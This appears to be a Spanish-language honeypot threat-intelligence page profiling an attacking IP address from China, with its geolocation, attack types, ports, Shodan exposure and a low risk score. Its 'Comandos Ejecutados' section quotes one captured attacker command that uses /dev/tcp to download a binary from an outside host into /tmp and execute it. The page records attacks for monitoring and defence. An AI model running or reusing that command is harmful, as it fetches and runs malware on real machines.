TROYANOSYVIRUS
Amenaza ActivaBAJO

114.66.16.119

Pais de Origen🇨🇳 China
Primera Deteccion26/4/2026
Ultima Actividad26/4/2026
ISPNINGBO, ZHEJIANG Province, P.R.China.
🎯
37
Ataques Totales
🔌
2
Puertos
📡
2
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇨🇳 China
Ciudad
Desconocida
ASN
AS136188
ISP
NINGBO, ZHEJIANG Province, P.R.China.

Tipos de Ataque

ssh_telnet_honeypot
redis_honeypot

Puertos Atacados

226379

Malware Asociado

Comandos Ejecutados

$nohup bash -c "exec 6<>/dev/tcp/47.242.120.223/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/GSx5XdhMKj && chmod +x /tmp/GSx5XdhMKj && /tmp/GSx5XdhMKj bXjKppN8cWZ9jrvJaBYaaM+kimV+emuMpM12GB92zKSLf354dI2t3mwbAmrKppN0cHFrj6bEbhwdbMa1j3V7ZnCKu89oFQJqz6GHc3h5dIm1ym8CHmvHu41ren1xh6POaR4ceMqmk3xxZnKEu8xpFRZuzqSJdWh5dIq7z20aAmrPrJNxfHJzjaTPbgwYb9CniXdmf3eTrMhiGhxpzqWdcX9md4mn0GkeHHbMp45/fnh0j6DebB8CYce7hXdmeX2Nr8hoHR9s3qGKa39+a4ytzXYdH2nEo410en5lhbvMaRwCYM67jHd4cnONpMpoDBR2zKSFa3l/dJOkym4WGmjPpo1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
806379809961616
CPEs
cpe:/a:apache:http_servercpe:/a:f5:nginxcpe:/a:gitlab:gitlabcpe:/a:redislabs:redis

Evaluacion de Riesgo

35
/100
BajoMedioAltoCritico